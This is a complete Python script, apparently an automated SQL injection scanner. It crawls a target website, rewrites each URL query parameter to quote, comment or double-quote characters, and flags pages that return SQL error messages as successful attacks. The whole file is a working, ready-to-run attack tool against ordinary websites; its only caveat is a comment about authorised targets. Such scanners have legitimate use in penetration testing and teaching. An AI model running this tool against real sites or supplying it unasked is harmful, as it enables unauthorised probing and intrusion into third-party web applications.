#!/usr/bin/python3

###[ Loading modules

import sys
import requests
from bs4 import BeautifulSoup
from urllib.parse import urlparse


###[ Global vars

max_urls = 999

inject_chars = ["'",
                "--",
                "/*",
                '"']

error_msgs = [
    "syntax error",
    "sql error",
    "failure",
]

known_url = {}
already_attacked = {}
attack_urls = []
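
# A sketch of how these globals get used (hypothetical host): attack() rewrites
# a query parameter to a bare inject char, e.g. http://example.test/view.php?id='
# and treats a response that differs from the baseline and contains one of
# error_msgs as a likely injection point.
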
###[ Subroutines
def get_abs_url(base_url, link):
    """
    check if the link is relative and prepend the protocol
    and host. filter unwanted links like mailto and links
    that do not go to our base host
    """
    if link:
        if "://" not in link:
            if link[0] != "/":
                link = "/" + link
            link = base_url.scheme + "://" + base_url.hostname + link

        if "mailto:" in link or base_url.hostname not in link:
            return None
        else:
            return link
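
# Example (hypothetical host), with base_url = urlparse("http://example.test"):
#   get_abs_url(base_url, "login.php")               -> "http://example.test/login.php"
#   get_abs_url(base_url, "mailto:admin@other.test") -> None  (mailto filtered)
#   get_abs_url(base_url, "http://other.test/")      -> None  (foreign host)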

def spider(base_url, url):
    """
    check if we don't know the url
    spider to url
    extract new links
    spider all new links recursively
    """
    if len(known_url) >= max_urls:
        return None

    if url:
        p_url = urlparse(url)

        if not known_url.get(url) and p_url.hostname == base_url.hostname:
            try:
                sys.stdout.write(".")
                sys.stdout.flush()
                known_url[url] = True
                r = requests.get(url)

                if r.status_code == 200:
                    if "?" in url:
                        attack_urls.append(url)

                    soup = BeautifulSoup(r.content,
                                         features="html.parser")

                    for tag in soup('a'):
                        spider(base_url, get_abs_url(base_url, tag.get('href')))
            except requests.exceptions.ConnectionError as e:
                print("Got error for " + url + ": " + str(e))

def found_error(content):
    """
    try to find error msg in html
    """
    for msg in error_msgs:
        if msg in content.lower():
            return True

    return False
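
# Example: found_error("<b>SQL error near line 1</b>") returns True because the
# lowercased page contains "sql error"; found_error("all good") returns False.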

def attack(url):
    """
    parse a url's parameters
    inject special chars
    try to guess if the attack was successful
    """
    p_url = urlparse(url)

    if p_url.query not in already_attacked.get(p_url.path, []):
        already_attacked.setdefault(p_url.path, []).append(p_url.query)

        try:
            sys.stdout.write("\nAttack " + url)
            sys.stdout.flush()
            r = requests.get(url)

            for param_value in p_url.query.split("&"):
                # partition() tolerates parameters whose value contains "="
                param, _, value = param_value.partition("=")

                for inject in inject_chars:
                    a_url = p_url.scheme + "://" + \
                            p_url.hostname + p_url.path + \
                            "?" + param + "=" + inject
                    sys.stdout.write(".")
                    sys.stdout.flush()
                    a = requests.get(a_url)

                    if r.content != a.content:
                        print("\nGot different content for " + a_url)
                        print("Checking for exception output")

                        if found_error(a.text):
                            print("Attack was successful!")
        except requests.exceptions.ConnectionError:
            pass
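
# Example (hypothetical target): attack("http://example.test/view.php?id=1")
# fetches the page once as a baseline, then probes
#   http://example.test/view.php?id='
#   http://example.test/view.php?id=--
#   http://example.test/view.php?id=/*
#   http://example.test/view.php?id="
# and flags any probe whose response differs and contains a known error message.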


###[ MAIN PART

if len(sys.argv) < 2:
    print(sys.argv[0] + ": <url>")
    sys.exit(1)

start_url = sys.argv[1]
base_url = urlparse(start_url)

sys.stdout.write("Spidering")
spider(base_url, start_url)
sys.stdout.write(" Done.\n")

for url in attack_urls:
    attack(url)
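
# Usage example (hypothetical target; only scan hosts you are authorized to test):
#   ./sql-injection.py "http://example.test/index.php"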